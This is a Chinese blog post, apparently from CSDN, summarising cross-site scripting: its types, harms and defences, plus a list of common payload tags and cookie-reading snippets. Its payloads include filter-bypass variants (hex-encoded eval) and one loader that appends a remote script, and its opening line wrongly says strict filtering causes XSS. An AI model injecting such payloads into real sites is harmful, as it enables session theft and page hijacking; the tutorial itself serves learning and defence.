XSS小总结

最新推荐文章于 2024-06-04 13:39:04 发布
最新推荐文章于 2024-06-04 13:39:04 发布
阅读量470 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wu000999/article/details/101924373
版权

原理

开发者在开发时,对客户端过滤严格,导致恶意的javascript代码在浏览器上执行
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。

分类

在这里插入图片描述

1. Reflected XSS(基于反射的XSS攻击)
2. Stored XSS(基于存储的XSS攻击)
3. DOM-based or local XSS(基于DOM或本地的XSS攻击)



	Reflected XSS		基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起 Web攻击。
Stored XSS		基于存储的XSS攻击,是通过发表带有恶意跨域脚本的帖子/文章,从而把恶意脚本存 储在服务器,每个访问该帖子/文章的人就会触发执行。
DOM-based or local XSS
基于DOM或本地的XSS攻击。一般是提供一个免费的wifi,但是提供免费wifi的网关会往你访问的任何页面插入一段脚本或者是直接返回一个钓鱼页面,从而植入恶意脚本。这种直接存在于页面,无须经过服务器返回就是基于本地的XSS攻击。

个人总结:XSS就是恶意js代码在浏览器被执行
数据流向:
	反射型 XSS 的数据流向是:浏览器 -> 后端 -> 浏览器。
	存储行 XSS 的数据流向是:浏览器 -> 后端 -> 数据库 -> 后端 -> 浏览器。
	DOM-XSS 的数据流向是:URL-->浏览器。

危害(攻击方式)

1.	挂马
2.	盗取用户Cookie。
3.	DOS(拒绝服务)客户端浏览器。
4.	钓鱼攻击,高级的钓鱼技巧。
5.	删除目标文章、恶意篡改数据、嫁祸。
6.	劫持用户Web行为,甚至进一步渗透内网。
7.	爆发Web2.0蠕虫。
8.	蠕虫式的DDoS攻击。
9.	蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据
10.	其它安全问题

常用标签

1.	<script scr="js_url"></script> 
2.	<a href=javascrip:alert('xss')>s</a>  
//点 击 s时 运 行 alert('xss')
3.	<iframesrc="javascript:alert(2)">
//若存在 X-frame 选项, Payload 失效。
4.	<img  scr=1  onerror=alert('xss')> 
//当 找 不 到图 片 名 为 1 的 文 件 时, 执 行 alert('xss')
5.	<video src=test.mp4 onerror=alert(‘1’);>//视频
6.	<audio src=test.mp3 onerror=alert(‘1’);>//音乐
7.	<orm action="Javascript:alert(1)"><input type=submit><isindex action="javascript:alert(1)" type=image>
8.	<svg/onload=prompt(1);>
//SVG 是使用 XML 来描述二维图形和绘图程序的语言。
9.	<body onload=prompt(1);>
10.	<select autofocus onfocus=alert(1)> 
// autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。
11.	<textarea autofocus onfocus=alert(1)>
<video><source>
//这里也可以通过各种变形绕过 WAF
12.	<img src=x onerror=appendChild(createElement('script')).src='js_url'  /> 
13.	<iframe  src=javascript:alert('xss');height=0  width=0  /><iframe>
//利  用 iframe 的 scr 来  弹  窗 
14.	<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> 
//过滤了alert 来执行弹窗等等有很多的方法,
15.	<svg onload=confirm``>

作用

获取cookie的几个语句
	<script>alert(document.cookie)</script>	获取当前页面的cookie
	<a href='' onclick=alert(document.cookie)>登录</a>		需要点击,查看cookie
	<body onload=alert(document.cookie)>
	<img src=x onerror=alert(document.cookie)>			x表示直接没有网址(只要src后面的网址错误就行),所以前面的条件错误,直接弹窗

	伪协议构造
		<iframe src=javascript:alert(document.cookie)>
		<a href="javascript:alert(document.cookie)">登录</a>
		<a href="javascript:%61lert(document.cookie)">登录</a>		%61是a的url编码
	网页重定向获取cookie
	
重定向
	<script>window.location='http://www.baidu.com'</script>

工具
BruteXSS

防护方式

1. 对特殊字符进行转义
2. 直接将标签过滤掉
3. 对cookie设置httponly
4. 对用户的输入内容做限制
5. 对数据进行在编码处理
6. 把关键字符转换html实体(最有效)
孤君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
32个触发事件XSS语句的总结
04-01
32个触发事件XSS语句的总结,新人学习xss必看!
xss常用pyload,及原理解释
大大大蜜蜂的博客
05-25 1301
xss常用pyload,及原理解释: ‘ JavaScript 中的方法 <script>标签:<script> 和 </script> 会告诉 JavaScript 在何处开始和结束。 alert() 方法:用于显示带有一条指定消息和一个 OK 按钮的警告框。 prompt() 方法:用于显示一个带有提示信息,并且用户可以输入的对话框。 document.write() 方法:打印指定的内容到页面上 document.cookie:使用 document.
XSS注入总结
最新发布
白帽黑客佳哥的博客
06-04 912
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。X-XSS-Protection,即XSS保护属性,是设置在响应头中目的是用来防范XSS攻击的。如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。将利用写在自己服务器上,核心是让受害者访问我们的服务器,然后触发别的网站的xss。所有能输入的地方都要试一次,有字数限制的可以在burp里改。里的时候,闭合标签会被当做代码执行。
XSS(跨站脚本攻击)详解
hello
07-02 3843
XSS简述-XSS类型-XSS常用标签
xss(跨站攻击)
m0_74456293的博客
03-20 2542
xss(跨站攻击)
XSS跨站脚本攻击漏洞(1)
weixin_51339377的博客
04-05 3176
XSS漏洞介绍: xss攻击的目录就是让前端把我们的攻击代码执行 跨站攻击 全都是前端的 只需要右击查看源代码就可以查看到漏洞了 测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很多免费的xss平台 可以直接使用) 弹窗基本代码: <script>alert(1)</script> 在输入框输入代码提交以后如果出现弹窗说明存在xss漏洞。此时提交成功可以右键在网页源代码里面看到自己提交上去的js代码 因为本身存储框,留言板这种就会在...
简单的利用XSS获取用户cookie
shy的博客
10-25 4283
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS跨站总结
02-09
一篇文档,让你理解XSS跨站攻防的来龙去脉
xss-vuln学习通关总结
08-24
XSS漏洞详解】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,主要表现为黑客通过注入恶意脚本到网页中,从而在用户浏览网页时控制用户的浏览器。这种攻击最初因为涉及跨域而得名,但随着JavaScript的...
Web安全之XSS攻击与防御小结
02-23
跨站脚本攻击(CrossSiteScripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起...
xss_javaxss_XSS_
10-04
总结来说,防止Java中的XSS攻击需要多层防御策略,包括输入验证、输出编码、使用安全API、自定义过滤器和安全的HTTP头。通过对用户输入进行严格的控制和处理,我们可以大大降低XSS攻击的风险,保护应用程序和用户的...
XSS注入知识点总结.pdf
02-07
该文档是在看网络学习视频总结,从XSS漏洞概述,XSS分类,XSS构造,XSS变形,XSS的利用,XSS的防御进行总结,分章节进行叙述,可作为学习文档。
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7067
XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
Web的基本漏洞--XSS漏洞
尽欢的博客
05-31 3325
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
XSS简单总结
Aiwin的博客
07-11 994
XSS的简单总结
XSS知识总结
weixin_64051447的博客
04-26 1693
HTML标签 等带src属性的标签都可以跨域加载资源,而不受同源策略的限制。每次加载时都会由浏览器发送一次GET请求,通过src属性加载的资源,浏览器会限制JavaScript的权限,使其不能读写返回的内容。
关于document.cookie的使用(转)
weixin_33881041的博客
12-22 1043
关于document.cookie的使用 ...
XSS漏洞原理详解丨小白WEB安全入门
jennycisp的博客
06-27 2008
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。
xss -- cookie获取
qq726232111的博客
09-11 661
0x0 cookie 简介 储存在用户本地终端上的数据,服务端可通过session会话获取cookie信息,cookie可用于身份验证,临时存储信息(商城网站的购物车)等 0x1 实验流程 用户点击构造链接 --> 发送cookie到指定服务器 --> 接收cookie保存到文件 0x2 实验环境 实验环境 window+phpstudy+dvwa dvwa中提供...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值